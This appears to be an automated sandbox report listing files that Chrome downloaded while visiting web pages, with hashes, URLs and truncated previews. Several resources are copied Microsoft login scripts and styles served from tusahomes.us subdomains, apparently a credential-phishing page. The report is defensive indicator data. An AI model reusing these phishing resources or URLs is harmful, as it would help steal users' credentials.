                                                                Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows icon resource - 6 icons, 16x16 with PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, 24x24 with PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced, 32 bits/pixel
                                                                Category:dropped
                                                                Size (bytes):20615
                                                                Entropy (8bit):7.966609372204125
                                                                Encrypted:false
                                                                SSDEEP:384:zGFYVgzVDDDCeeY5lxTIEA5LJJnzO+VGUzBgg3ersSer3k11e2xGTOZe:aFRVuzY3A5LfnVGm2g3erm3k1aTOs
                                                                MD5:353D12CC60C57A7B9305502BB1D8E502
                                                                SHA1:FCFFA4016CC79F9BEDE4C2A0A1DD1DABDCABEC2A
                                                                SHA-256:17CD96D04E51E29F974A27A0AED952568F3B5249ABB07CEBDE08605B2A0CF089
                                                                SHA-512:47E84CA1776942C617CF37898851626DD31FE24C6DB6F01B29DD001E3B953F4CF2A86E5BB87028D9C34EB0C65BD2517ED36E3355532B92127CEBB1B8C45A8707
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:............ .>...f......... ......... .... .....g...00.... .q.......@@.... .."..a#........ .T...3F...PNG........IHDR................a....IDATx.5.n,E.F.zfv..k.....O.S..@JF....&.DH....;.?.,..Z..S.....s8...+Y...>.;.../..?...|.H.....Ocx..&k..D..L..,./..8.(...q....&e...U"..n..hb-.!qm.".T.iha....t=....)...*5.Z...vX...$.uS...\,7.=N.iJ.....DF.E.R.xO.mq-..{...0...C.....V...t.-.o.....OYo.....R....o..<..{e...v...._M.;....m.k..*5...].f.mU..&'.<..n.Z...6......r..z.......W....g..-....li.(.e]...:_q...C..q..o......&....KC..d...(.$#..1.{,..r.]...?7.A.u..F.N6//8j......#U..^..U...."`..V.......!.y......L.n..{S.E.*c#.Fq.g..o5.X.4."=.E.........6..4....IEND.B`..PNG........IHDR..............w=.....IDATx.=.M..I......Y..V.F..X...f.fv\..p.1...`...f$Z....'+3....b.fa......z.......bY......v.i..~..w..............h.l-.6].rr...7N.|.L'\@..(.....;PI|.x;5.........b..1.....6M .*.......&F0..~.z.0.E.c{..1..l..'....).u&;U*.6,}Hs.........c...$.L7.N.^"8"B..y..R..K..E6F.).......3..x.J@.....
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                Category:dropped
                                                                Size (bytes):3620
                                                                Entropy (8bit):6.867828878374734
                                                                Encrypted:false
                                                                SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (4348), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):4348
                                                                Entropy (8bit):5.009064839593052
                                                                Encrypted:false
                                                                SSDEEP:96:knPdKhXl4w3ym/HtRSw8AlcWmEZ7lXf7cCaSTSLlWpKdBAUjV5e:ko13fqw8AjRespKdyse
                                                                MD5:748820E4E2FE753CB4AED92AA1CBD008
                                                                SHA1:0D81BEEA2FE82C131AE2543BCEC0AEC0FACD0C8A
                                                                SHA-256:DAE7889F3E3E2455939987A02FC6EF85137565A2238346D7EE7E62BB504F9466
                                                                SHA-512:F8A8AB618B661C5DB4D12FBF0138FA989A3C1E200179E162052E87A682B396DDE2E4A6480339E6E03D1B1BD171691B1078A4994E658A5ED492A94E890473FFD5
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://static.pagewizcdn.com/LPStaticResources/jquery.tip.js?v=18.01.24
                                                                Preview:(function(h){h.fn.tip=function(b){var a=h.extend({},h.fn.tip.defaults,b);if(a.onHover){if(a.stickIfCurrent){this.filter("."+a.currentClass).each(function(c){h(this).createTip(a)})}if(a.reverseHover){h(this).createTip(a);this.hover(function(){if(!a.stickIfCurrent||!h(this).hasClass(a.currentClass)){h(this).hideTip()}},function(){h(this).showTip(a)})}else{this.hover(function(){h(this).showTip(a)},function(){if(!a.stickIfCurrent||!h(this).hasClass(a.currentClass)){h(this).hideTip()}})}}else{this.createTip(a)}return this};h.fn.tip.defaults={content:false,onHover:true,reverseHover:false,stickIfCurrent:false,currentClass:"current",offset:4,position:"top",animationOffset:4,delay:0};h.fn.showTip=function(b){var a=h.extend({},h.fn.tip.defaults,b);this.each(function(i){var m=h(this);var c=(h.browser.msie&&h.browser.version<9);var d=m.data("tip");if(!d){m.createTip(a,c?false:true);d=m.data("tip")}else{if(a.content!==m.data("settings").content){m.updateTipContent(b.content)}}if(!c){var n=f(m,d,a,f
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3958
                                                                Category:downloaded
                                                                Size (bytes):1506
                                                                Entropy (8bit):7.747738029071203
                                                                Encrypted:false
                                                                SSDEEP:24:XaushnKsPhUnid1PFi3kFAEvTl4s99M620mAvaXcutwh2oPRFJqowp+YfOiPuQNS:XahhKMhUifFiU6ELlP96620yNwgMFgo5
                                                                MD5:5F531853F9D471FD8B9DA987E8345529
                                                                SHA1:4600E5BAA3BCADC2AA37C7A55287FC1B3785E75D
                                                                SHA-256:4C73CF41367556364E4D05C9D4B1A7C90653C50EDD2CC10C93C0F395F3FE1CA4
                                                                SHA-512:0D7B7004D9EFCDF8ADDBD717EE18FEBEF99B0FB8959B4F658DED7F517595C4309C4508653A799B4E45BAF57E2BD565D5734B6069E62108BDFC6D1E88D85F26D2
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:http://p1.pagewiz.net/favicon.ico
                                                                Preview:............`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"~..7N...O.<y...<M..L_~....I.....wr...7O....o.x..w.7u.l....Yy.....m.zt........./.yu..`..e.u.......GG.5.J.-.e.Y........Rn.g3....-.2?z|W~...h..j;.E...~...O..*k.I...N.e./..>:;.,.].'w..M~.HY,.u^~.Q.^.y3....t^..cCHNW.Uv._.?.O...i..]].......Gi{..?.............O..u..?.h.M.^..z9{......!T...U.HiT.j..G..!D.)h..G...eA...?......~o..~.{..wN.[.Z..yK.....K...AE....Yq.N.......v1..K..X...i....lA.....O..~....7..0..2+.......W_.^..|..7..?.x....>......|w.9i...'.S....y....{..wV..t.j....^._.........8...!|....n.../N_....U.w......{....>...y.........7..6i....Y.....................4L41#qHI..R>!>.............@.....A.L..G..u.Z.y=^-/B...l9+..).f..|7........G&M.g..o...Kb^H..h....m..5..x.{D..n....U.>.....F^.Q./CO..4w....?....z.(7..E..b.......n...bN......O.........j.EV.,o..<.Y.;......gy.hw.......K..,..........[...{t.....9..hw.....<......z...<.,...:.g.9.._..6...l.$
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with very long lines (3691)
                                                                Category:downloaded
                                                                Size (bytes):3692
                                                                Entropy (8bit):5.299795895141489
                                                                Encrypted:false
                                                                SSDEEP:48:3qYj9mB9KFz9ODzDzBziQQ4RHUrLOYs9Hti8uL4n0ig+QqfBU6FILLWDvQCzrFv:3qO9I9Sz9cNHULI5m4n0imQBGLLW5v
                                                                MD5:92056096B0D3461D52AE8EAB0C480B99
                                                                SHA1:052F33BDA5219F4BD761B5C2C8062B58E1B86F98
                                                                SHA-256:512E9E90CBB81ED8595AF3FB325F7896D663F13EDBE48A3FFCA0587E10FA37F3
                                                                SHA-512:F896D149B8D0A567F88C9B3A11C0E6B95133AE3CBDFEB7290D71632E5A2265A241C1436150722ECA992DAB654BF5201A120729DE0A522EECC26152C861561EF8
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://8f0da58963954c5ebda6645ba9a83b28.tusahomes.us/Me.htm?v=3
                                                                Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (16112), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):16349
                                                                Entropy (8bit):5.170414756000281
                                                                Encrypted:false
                                                                SSDEEP:192:WsIOtUsVUdONdOPdOK1U5NPmt9Z4UEdvuw8n+0QxMn7nI/RZMZLJLI3FniWg:lIEiGemNP0lEdmwmQxMn7ndLJLI3Fno
                                                                MD5:E1883FA0BC396A7B2F516369356BC33F
                                                                SHA1:F9DCE0C64EF77BB3BA1201EF3C064D3231842288
                                                                SHA-256:1E3464D58F54251D37EF8FD68D85B482951BAD113B32F806CEA926342F1712A6
                                                                SHA-512:5572BA7F8E9913C5C3A1352972F8F176AA056B2CE952270B43DE8E4775F34FD02EFB6C4A88359665BAAAEBD745B3F630A2DB2F6E563B358B56C504D563EA1691
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://static.pagewizcdn.com/LPStaticResources/style2/bootstrap.min.css?v=18.01.24
                                                                Preview:/*!.. * Bootstrap v2.0.4.. *.. * Copyright 2012 Twitter, Inc.. * Licensed under the Apache License v2.0.. * http://www.apache.org/licenses/LICENSE-2.0.. *.. * Designed and built with all the love in the world @twitter by @mdo and @fat... */.clearfix{*zoom:1}.clearfix:before,.clearfix:after{display:table;content:""}.clearfix:after{clear:both}.hide-text{font:0/0 a;color:transparent;text-shadow:none;background-color:transparent;border:0}.input-block-level{display:block;width:100%;min-height:28px;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;-ms-box-sizing:border-box;box-sizing:border-box}.btn{display:inline-block;*display:inline;*zoom:1;padding:4px 10px 4px;margin-bottom:0;font-size:13px;line-height:18px;*line-height:20px;color:#333;text-align:center;text-shadow:0 1px 1px rgba(255,255,255,0.75);vertical-align:middle;cursor:pointer;background-color:#f5f5f5;background-image:-moz-linear-gradient(top,#fff,#e6e6e6);background-image:-ms-linear-gradient(top,#fff,#e6e6e6);background-im
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):72
                                                                Entropy (8bit):4.241202481433726
                                                                Encrypted:false
                                                                SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                MD5:9E576E34B18E986347909C29AE6A82C6
                                                                SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows icon resource - 6 icons, 16x16 with PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, 24x24 with PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced, 32 bits/pixel
                                                                Category:downloaded
                                                                Size (bytes):20486
                                                                Entropy (8bit):7.965335684299587
                                                                Encrypted:false
                                                                SSDEEP:384:5ckHM3pb3HMoECs/UFjwaUSaIswXeZ7DUJA+Jd5w4MwcnsLEH6BXTqwUq58r:HHMhHMVGF8aUSazwXex+Jzw3wKXaUwbq
                                                                MD5:B513887A96AF33856BFB1DFE52498A4A
                                                                SHA1:DDA8A38FE20FFA879097A90F967D3FBC028401C2
                                                                SHA-256:C9095D623FD144979373FA4F553DE76E3F896B5E1E795FB6C9C7153AD81E2242
                                                                SHA-512:8C1705CAD1E27730AF92C78C91F874CED5A75557A398D828720200423436193679B98C28C1AD93EF4649D9E4B7A8DED1F8405D82A46D78C3F215A71C94383649
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                                Preview:............ .M...f......... ......... .... .........00.... .b.......@@.... .e"..p#........ .1....E...PNG........IHDR................a....IDATx.=.1r$E.../..[.i...b`......q....&G......HZI.......^....G.o.Y.M.K.).......?.......x...n2%......Kff......H!r.y@&....R.......iG...Tzf..!2..D..D......Kr.RDiE...5...!r..ea.05i-.s.>FDR".g|m.k..T.5.^.w....ak"v...k.r.Qw.0lR..)B..l..0.Z.U....g..n.jk....w...Sml+eb.`....._..Q..Qg..=...*.......(a.~..0.......X.W..M>..E.0..7p-.G..>..c.WS..........._.Oqt.w.(XQ..s..A...s"E4QG<......f..-...\Z.,.,2....~D..mo.D...4!.y...(b.{...3....S,.....OX....7o%.....\....qeg5..P..a.T.N.D.D WL.i.Q.8I/.......S.../..U?...N.y........|."...G.....IEND.B`..PNG........IHDR..............w=.....IDATx.-..$W...o....f....z",.,,,l^...x.<.. B.h$.....n.gat.;N..g...z..W.=z...Vj.4z...CU-.u...._....{..c..i.g..VU.a..\.11`..n.lT.V.{...Pj3...<&.2$NJ.....G.j.{wWe.Fo..m.......$r.\.......+.......{;\.u..&/)\V..C.?T...'?.ZMK|(.HO...Vu..%YO.vwu..K...b.n...l....;.a.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                Category:downloaded
                                                                Size (bytes):807
                                                                Entropy (8bit):0.2929836665455332
                                                                Encrypted:false
                                                                SSDEEP:3:CUI/lylAxBFzen:0he
                                                                MD5:18B3E43ABAD26BDAC6F4CEA944777B62
                                                                SHA1:5848CD0ACA8D9FC92D8449B13F829CC1F6CD310A
                                                                SHA-256:3CA19E57C9A2465AE4DF271316BA4D29E7FF7F113A2A2C5297780C0B7A0AC09D
                                                                SHA-512:1615D2831EE2B7A6FDA558521CC36AA0974262869F162635B6321644E23B278808B1760979CE30EC4B2BBC41AF487E1E434370B5905D7846E0904C4550D7B4BA
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://stats.pagewiz.com/PWPixel.aspx?guid=f24cc4c2-2ef1-79f4-1744157914689-6fd32dc72398&op=1&pid=648467&refer=&href=http%3A//p1.pagewiz.net/vericastharlandclarke/&hostname=p1.pagewiz.net&referrer=&appCodeName=Mozilla&appName=Netscape&appVersion=5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit/537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome/134.0.0.0%20Safari/537.36&cookieEnabled=true&language=Mozilla&platform=Win32&userAgent=Mozilla/5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit/537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome/134.0.0.0%20Safari/537.36&screenWidth=1280&screenHeight=1024&uv=1
                                                                Preview:GIF89a.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,................;
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, original size modulo 2^32 58614
                                                                Category:downloaded
                                                                Size (bytes):16613
                                                                Entropy (8bit):7.98665907705183
                                                                Encrypted:false
                                                                SSDEEP:384:NWZV40Gho404SknzQoXUtxIcbeFNi3/yjDzSqjQ:NcK0gN00zQtTWFNigDzs
                                                                MD5:5E74E0A421A586AA14A0103437202459
                                                                SHA1:0C08FFE38B811E1DEF2F8A2A636C2DC86A1A69BC
                                                                SHA-256:46AA91C5AD95DFD34586492EFA7612800CCC6D7B31BAADB25369169BEDF343DA
                                                                SHA-512:39E2E4EF4B233D436DD11ABA3F97A372AE694D7E516A69E65E2DFDCD1AD8645340B2C1346C6FBC35C2A4220A60BDB01819BA46C62485C39A4E6F95BEFD0A796F
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_cwzkvppibgumnhupu2wjoa2.js
                                                                Preview:...........}Ms#.......f....O..1..3.!....RH2....~......Q.x7...}..'.}..?e#...QU]....Vo.....].U............^..{..w!x..=z....{..._..%.i..q........j<.w...7..."pgbV.C..kYU`..X....'t....<p........x...!..4mx..Q,:.....?&.p.....Q/.............=.m.Q.z.M...=..3'...."....L...{".?..k..../.E8...T.,FqXt.6.].tu6.....w.W..7i..s.Z,&c.)n.[.pcQp...4..`....4X.q..^...E.M.p|qoBh..B+..<q..Pgb.j....\.!...q..Q.k....>.}z'`~....E<.{.B4..w..x~...F.-.........>T..b.,...S.O.z...<.......=.N..S.GB.......m......J.\9........W.2.A)h.V..:t..t.O.J.).CO......K.w&..4?.d..r..4.7.8(L. ..-......:.J.y....%n..<..n....-....Oo_>a....-.i.............{O...1.M....V>..=N..(.4.K.t../.1....\F..`._Bz......u..[,...].3.0.3.....L|..*.a!.!.t.....[x..Xv:.QTp....ZE.u.`...s..o\.....)..a0..5....oN..{h..l)..QL.d.X.E.]...%$.H.|...wWo..........BwPpg...W/|..\X..F.[5.e.[ .o........S.3/..3@n.......=P A.B6...{{.g.=...L...tl.rJ..X.J,...;.}7..O/......Z........)...,`l...7 ...C....QQ.3(..{...Z2...qs....x.....
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (2232), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):2232
                                                                Entropy (8bit):5.367453471448081
                                                                Encrypted:false
                                                                SSDEEP:48:CMgSLfCNq/XT2Cra1TaxBJPEU2ZLPYPG5IqAhWZ4f4JyBdE3IrextMR:ClUAq/Xzra12rJPEU2ZLPYPGqqoWJJyV
                                                                MD5:FDD1DA772F2A40F1C740ABF4A12EB577
                                                                SHA1:5B8F71168FAF2B9CD0970329BFD3555B4D4F6B17
                                                                SHA-256:5C0490843F9721BE90114B7A0EE298BC53404A565DCE1A55949316609F2E0701
                                                                SHA-512:4EC035D230E8EE6264EEA53C2F63FD6F487E04C53D5EFE6F83FC7CE19E319E2E00FDAA7FB6ADD2ABAFFC396FD819FA775E708C5FA44CE003AB107682ABE64AC0
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://static.pagewizcdn.com/LPStaticResources/jquery.json-2.2.js?v=18.01.24
                                                                Preview:(function($){$.toJSON=function(o){if(typeof(JSON)=="object"&&JSON.stringify){return JSON.stringify(o)}var type=typeof(o);if(o===null){return"null"}if(type=="undefined"){return undefined}if(type=="number"||type=="boolean"){return o+""}if(type=="string"){return $.quoteString(o)}if(type=="object"){if(typeof o.toJSON=="function"){return $.toJSON(o.toJSON())}if(o.constructor===Date){var month=o.getUTCMonth()+1;if(month<10){month="0"+month}var day=o.getUTCDate();if(day<10){day="0"+day}var year=o.getUTCFullYear();var hours=o.getUTCHours();if(hours<10){hours="0"+hours}var minutes=o.getUTCMinutes();if(minutes<10){minutes="0"+minutes}var seconds=o.getUTCSeconds();if(seconds<10){seconds="0"+seconds}var milli=o.getUTCMilliseconds();if(milli<100){milli="0"+milli}if(milli<10){milli="0"+milli}return'"'+year+"-"+month+"-"+day+"T"+hours+":"+minutes+":"+seconds+"."+milli+'Z"'}if(o.constructor===Array){var ret=[];for(var i=0;i<o.length;i++){ret.push($.toJSON(o[i])||"null")}return"["+ret.join(",")+"]"}var
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (2682), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):2682
                                                                Entropy (8bit):5.489653992233532
                                                                Encrypted:false
                                                                SSDEEP:48:/DZa9wjTko4ClhbDil4vLczYmGC8i6Onno6HWpEkU937bkhnazh4tDiZYoCLiA:/8wkLClt2TzYpezo6HWBAkhnL2tjA
                                                                MD5:8B62144C000C8EA197B151B3E2907CF0
                                                                SHA1:51F388FBB0A3B347AEE8E7DE31FB2087CD8873C1
                                                                SHA-256:20CFDC6F852C04036981A714AFCA21E5AB5F62091A11DAD4B3DE971678882533
                                                                SHA-512:07BA00FB3DA15A258C869ECC76EA5E9F2C08254A6E59298D4A61C184F7AA8FF333202A89C09C1EAAD4147BBDA15234B4B11E5B2BB975141DD54250070EAD641F
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://static.pagewizcdn.com/LPStaticResources/FontFix.js?v=18.01.24
                                                                Preview:$(window).load(function(){FixFontBoosting()});function FixFontBoosting(){var m="";var d=true;var f=i();var h=n();var q=1;var p=0.99;o();function o(){if(location.href.indexOf("BlockFontBoosting")>0){return}if(!a()){return}e();$(".draggable.Text").each(function(){b(this,("#"+this.id+"_text"),$(this).height())});$(".draggable.Headline").each(function(){k(this,$(this).find(":first"),$(this).height())})}function e(){if(!f&&!h){return}$("body").append('<div id="_pw_testFont" style="display:none;font-size:16px">h941</div>');q=parseFloat($("#_pw_testFont").css("font-size"))/16;if(q<=1){return}$("*[style*='font-size']").css("font-size",function(s){return parseInt($(this).css("font-size"))/(q*q)+"px"});$("*[style*='line-height']").css("line-height",function(s){return parseInt($(this).css("line-height"))/(q*q)+"px"})}function b(x,u,z){var y=15;var v=10*q;var t=0;var A;var w;var s=$(u).find("span,p,div,a");while(($(u).height()-v>z)&&(t++<y)){s.each(function(){A=parseFloat($(this).css("font-size"))
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                Category:dropped
                                                                Size (bytes):807
                                                                Entropy (8bit):0.2929836665455332
                                                                Encrypted:false
                                                                SSDEEP:3:CUI/lylAxBFzen:0he
                                                                MD5:18B3E43ABAD26BDAC6F4CEA944777B62
                                                                SHA1:5848CD0ACA8D9FC92D8449B13F829CC1F6CD310A
                                                                SHA-256:3CA19E57C9A2465AE4DF271316BA4D29E7FF7F113A2A2C5297780C0B7A0AC09D
                                                                SHA-512:1615D2831EE2B7A6FDA558521CC36AA0974262869F162635B6321644E23B278808B1760979CE30EC4B2BBC41AF487E1E434370B5905D7846E0904C4550D7B4BA
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:GIF89a.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,................;
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, original size modulo 2^32 113424
                                                                Category:downloaded
                                                                Size (bytes):20410
                                                                Entropy (8bit):7.980595770689542
                                                                Encrypted:false
                                                                SSDEEP:384:FRvmaMFysnOXZ2m9zM+udO6GGUpeAU02oDGnN5EsQwWUQGTS8r2k:Fpmm7ZFM+ObGGUIjN5PJV3Tp
                                                                MD5:273CC7FE2E205C99A9DEF22741097AC6
                                                                SHA1:3CE0C03B0EBB16CADAFC0B49BA37C6227BEDD113
                                                                SHA-256:FC9CF55816165FBEEC0C3AF3B3CE6941739ABEFF02B74EBA5F082A46FA27B205
                                                                SHA-512:F0A1EA26E67A4F1E4573383A53DEDBABB69F035CE52276938F69AFAEEAC5FC99859C024369AA43DA368D5E0297D0D4E26FE0BEC701FD31E7B9B21E34C22659C2
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                                Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, original size modulo 2^32 458176
                                                                Category:downloaded
                                                                Size (bytes):123878
                                                                Entropy (8bit):7.997300330372183
                                                                Encrypted:true
                                                                SSDEEP:3072:L93T4W/mvHOPffgIVz5EbfmYcPE3qQh5uOu2mnyM5I87V1hW3dy0:LZpfgwKT6E3ZnGnyid7V1UP
                                                                MD5:C7343ABB1AB027404D45F111DE97FED4
                                                                SHA1:0FEFFF147B339941B613B8EDBC436A7DC8D1A7AF
                                                                SHA-256:96382A09DBD2861BE7AC25F50B26C8E2C3FB6FDCB226B404AB10FB65304CF11A
                                                                SHA-512:BAB80A821E6CB35010E71FFAF68D37861B89EF8E5A478AD18346C1BF83EF8DB8055FF1544CA5FDA40E62DA88C2648AFE2F6B8A46F39764C513CEA97FD6540AF4
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/js/ConvergedLogin_PCore_JXiTFACSOROsZgtGRJo1aA2.js
